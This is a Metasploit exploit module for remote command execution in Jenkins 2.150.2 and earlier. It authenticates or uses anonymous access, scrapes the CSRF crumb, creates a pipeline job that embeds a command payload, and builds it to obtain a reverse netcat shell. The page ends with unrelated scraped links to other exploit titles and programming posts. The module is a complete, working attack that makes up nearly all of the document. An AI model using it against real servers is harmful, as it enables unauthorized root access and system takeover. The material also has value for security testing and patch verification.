##

# This module requires Metasploit: https://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote

  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpClient

    def initialize(info = {})

        super(update_info(info,

          'Name'           => 'Jenkins <= 2.150.2 Remote Command Execution via Node JS (Metasploit)',

          'Description'    => %q{

                  This module can run commands on the system using Jenkins users who has JOB creation and BUILD privileges.

                  The vulnerability is exploited by a small script prepared in NodeJS.

                  The sh parameter allows us to run commands.

                  Sample script:

                                node {

                                      sh "whoami"

                                }

                  In addition, ANONYMOUS users also have the authority to JOB create and BUILD by default.

                  Therefore, all users without console authority can run commands on the system as root privilege.

          },

          'Author'         => [

            'AkkuS <Özkan Mustafa Akkuş>', # Vulnerability Discovery, PoC & Msf Module

          ],

          'License'        => MSF_LICENSE,

          'References'     =>

            [

              ['URL', 'https://pentest.com.tr/exploits/Jenkins-Remote-Command-Execution-via-Node-JS-Metasploit.html']

            ],

          'Privileged'     => true,

          'Payload'        =>

            {

              'DisableNops' => true,

              'Space'       => 512,

              'Compat'      =>

                {

                  'PayloadType' => 'cmd',

                  'RequiredCmd' => 'reverse netcat generic perl ruby python telnet',

                }

            },

          'Platform'       => 'unix',

          'Arch'           => ARCH_CMD,

          'Targets'        => [[ 'Jenkins <= 2.150.2', { }]],

          'DisclosureDate' => 'Feb 11 2019',

          'DefaultTarget'  => 0,

          'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat' }))

          register_options(

            [

                OptString.new('USERNAME', [ false, 'The username to authenticate as', '' ]),

                OptString.new('PASSWORD', [ false, 'The password for the specified username', '' ]),

                OptString.new('PATH', [ true, 'The path to jenkins', '/' ]),

            ], self.class)

    end

##

# Jenkins activity check

##

    def check

        res = send_request_cgi({'uri' => "/login"})

        if res and res.headers.include?('X-Jenkins')

            return Exploit::CheckCode::Detected

        else

            return Exploit::CheckCode::Safe

        end

    end

    def exploit

        print_status('Attempting to login to Jenkins dashboard')

        res = send_request_cgi({'uri' => "/script"})

        if not (res and res.code)

            fail_with(Exploit::Failure::Unknown)

        end

        sessionid = 'JSESSIONID' << res.get_cookies.split('JSESSIONID')[1].split('; ')[0]

        @cookie = "#{sessionid}"

    print_status("#{sessionid}")

        if res.code != 200

            print_status('Logging in...')

##

# Access control and information

##

            res = send_request_cgi({

                'method'    => 'POST',

                'uri'       => "/j_acegi_security_check",

                'cookie'    => @cookie,

                'vars_post' =>

                    {

                        'j_username' => Rex::Text.uri_encode(datastore['USERNAME'], 'hex-normal'),

                        'j_password' => Rex::Text.uri_encode(datastore['PASSWORD'], 'hex-normal'),

                        'Submit'     => 'Sign+in'

                    }

            })

            if not (res and res.code == 302) or res.headers['Location'] =~ /loginError/

                print_error('User Login failed. If anonymous login is active, exploit will continue.')

            end

        else

            print_status('No authentication required, skipping login...')

        end

##

# Check Crumb for create pipeline

##

    cookies = res.get_cookies

        res = send_request_cgi({

        'method' => 'GET',

            'uri' => "/view/all/newJob",

            'cookie'  => cookies

        })

        html = res.body

        if html =~ /Jenkins-Crumb/

          print_good("Login Successful")

        else

          print_status("Service found, but login failed")

          exit 0

        end

    crumb = res.body.split('Jenkins-Crumb')[1].split('");<')[0].split('"').last

        print_status("Jenkins-Crumb: #{crumb}")

##

# Create Pipeline

##

        res = send_request_cgi({

        'method' => 'POST',

            'uri' => "/view/all/createItem",

            'cookie'  => cookies,

            'vars_post' =>

                {

                    'name' => "cmd",

                    'mode' => "org.jenkinsci.plugins.workflow.job.WorkflowJob",

                    'from' => "",

                    'Jenkins-Crumb' => "#{crumb}",

                    'json' => "%7B%22name%22%3A+%22cmd%22%2C+%22mode%22%3A+%22org.jenkinsci.plugins.workflow.job.WorkflowJob%22%2C+%22from%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%22528f90f71b2d2742299b4daf503130ac%22%7"

                }

        })

##

# Configure Pipeline

##

        shell = payload.encoded

        res = send_request_cgi({

        'method' => 'POST',

            'uri' => "/job/cmd/configSubmit",

            'cookie'  => cookies,

            'vars_post' =>

                {

                    'description' => "cmd",

                    'Jenkins-Crumb' => "#{crumb}",

                    'json' => "{\"description\": \"cmd\", \"properties\": {\"stapler-class-bag\": \"true\", \"hudson-security-AuthorizationMatrixProperty\": {}, \"jenkins-model-BuildDiscarderProperty\": {\"specified\": false, \"\": \"0\", \"strategy\": {\"daysToKeepStr\": \"\", \"numToKeepStr\": \"\", \"artifactDaysToKeepStr\": \"\", \"artifactNumToKeepStr\": \"\", \"stapler-class\": \"hudson.tasks.LogRotator\", \"$class\": \"hudson.tasks.LogRotator\"}}, \"org-jenkinsci-plugins-workflow-job-properties-DisableConcurrentBuildsJobProperty\": {\"specified\": false}, \"org-jenkinsci-plugins-workflow-job-properties-DisableResumeJobProperty\": {\"specified\": false}, \"com-coravy-hudson-plugins-github-GithubProjectProperty\": {}, \"org-jenkinsci-plugins-workflow-job-properties-DurabilityHintJobProperty\": {\"specified\": false, \"hint\": \"MAX_SURVIVABILITY\"}, \"org-jenkinsci-plugins-pipeline-modeldefinition-properties-PreserveStashesJobProperty\": {\"specified\": false, \"buildCount\": \"1\"}, \"hudson-model-ParametersDefinitionProperty\": {\"specified\": false}, \"jenkins-branch-RateLimitBranchProperty$JobPropertyImpl\": {}, \"org-jenkinsci-plugins-workflow-job-properties-PipelineTriggersJobProperty\": {\"triggers\": {\"stapler-class-bag\": \"true\"}}}, \"disable\": false, \"hasCustomQuietPeriod\": false, \"quiet_period\": \"5\", \"displayNameOrNull\": \"\", \"\": \"0\", \"definition\": {\"script\": \"node {\\n    sh \\\"#{shell}\\\"\\n}\", \"\": [\"try sample Pipeline...\", \"\\u0001\\u0001\"], \"sandbox\": true, \"stapler-class\": \"org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition\", \"$class\": \"org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition\"}, \"core:apply\": \"\", \"Jenkins-Crumb\": \"#{crumb}\"}",

                    'Submit' => "Save"

                }

        })

        if res.code == 302

          print_good("Pipeline was created and Node JS code was integrated.")

        end

##

# Build Pipeline and Execute payload

##

        print_status("Trying to get remote shell...")

        res = send_request_cgi({

        'method' => 'POST',

            'uri' => "/job/cmd/build?delay=0sec",

            'cookie'  => cookies,

            'vars_post' =>

                {

                    'Jenkins-Crumb' => "#{crumb}"

                }

        })

    handler

    end

end

##

# End

##

[EXP]Jenkins 2.150.2 - Remote Command Execution (Metasploit)的更多相关文章

  1. [EXP]Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)

    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...

  2. struts2 CVE-2012-0392 S2-008 Strict DMI does not work correctly allows remote command execution and arbitrary file overwrite

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

  3. PowerShell vs. PsExec for Remote Command Execution

    Posted by Jianpeng Mo / January 20, 2014 Monitoring and maintaining large-scale, complex, highly dis ...

  4. struts2 CVE-2010-1870 S2-005 XWork ParameterInterceptors bypass allows remote command execution

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

  5. JMX/RMI Nice ENGAGE <= 6.5 Remote Command Execution

    CVE ID : CVE-2019-7727 JMX/RMI Nice ENGAGE <= 6.5 Remote Command Execution description=========== ...

  6. [EXP]Apache Spark - Unauthenticated Command Execution (Metasploit)

    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...

  7. [EXP]Apache Superset < 0.23 - Remote Code Execution

    # Exploit Title: Apache Superset < 0.23 - Remote Code Execution # Date: 2018-05-17 # Exploit Auth ...

  8. struts2 CVE-2013-1965 S2-012 Showcase app vulnerability allows remote command execution

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

  9. struts2 CVE-2013-2251 S2-016 action、redirect code injection remote command execution

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

随机推荐

  1. python 网络编程 缓冲和粘包

    tcp:属于长连接,与一个客户端进行连接了以后,其他的客户端要等待,要连接另外一个,必须优雅的断开前面这个客户端的连接. 允许地址重用:在bind IP地址和端口之前加上,# server.setso ...

  2. [leetcode]11. Container With Most Water存水最多的容器

    Given n non-negative integers a1, a2, ..., an , where each represents a point at coordinate (i, ai). ...

  3. 解决find命令报错: paths must precede expression(转)

    原文地址:https://www.cnblogs.com/peter1994/p/7297656.html 在一天早上,想在服务器 /tmp 目录清除一些pdf文件,大概一万多个文件,在执行命令的时候 ...

  4. PHP+ajax实现二级联动

    <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8&quo ...

  5. 改变this的指向问题;

    用call()和apply()改变this的指向,那什么时候用this呢?(构造函数),那为什么要用构造函数呢?(为了生成对象). 1.解决函数内this指向的问题 (1)var that/_this ...

  6. CentOS7 安装oracle客户端

    1.本机环境CentOS7 64 [root@localhost etc]# uname -a Linux localhost.localdomain 3.10.0-693.el7.x86_64 #1 ...

  7. Quartz.Net进阶之三:SimpleTrigger详述

    以前都是将所有的内容放在一篇文章里,就会导致文章很长,对于学习的人来说,有时候这也是一个障碍.所以,以后我的写作习惯,我就会把我写的文章缩短,但是内容不会少,内容更集中.这样,学习起来也不会很累,很容 ...

  8. xpath&css选择器

    本文参考较多,原创基本没有,权当知识归纳. xpath并不复杂,简单的使用看完之后,及时查阅文档也是可以写出来的. 这里放上我的练手文件,大家可以参考,或者挑毛病(*^__^*) 嘻嘻-- xpath ...

  9. 【APP测试(Android)】--硬件测试

  10. 统计百分比的一个SQL脚本

    统计一个表中一个百分比的SQL脚本,不过这个是个万分比,这个数据类型要调一调 ),) declare @num3 decimal,@num4 decimal declare @percent deci ...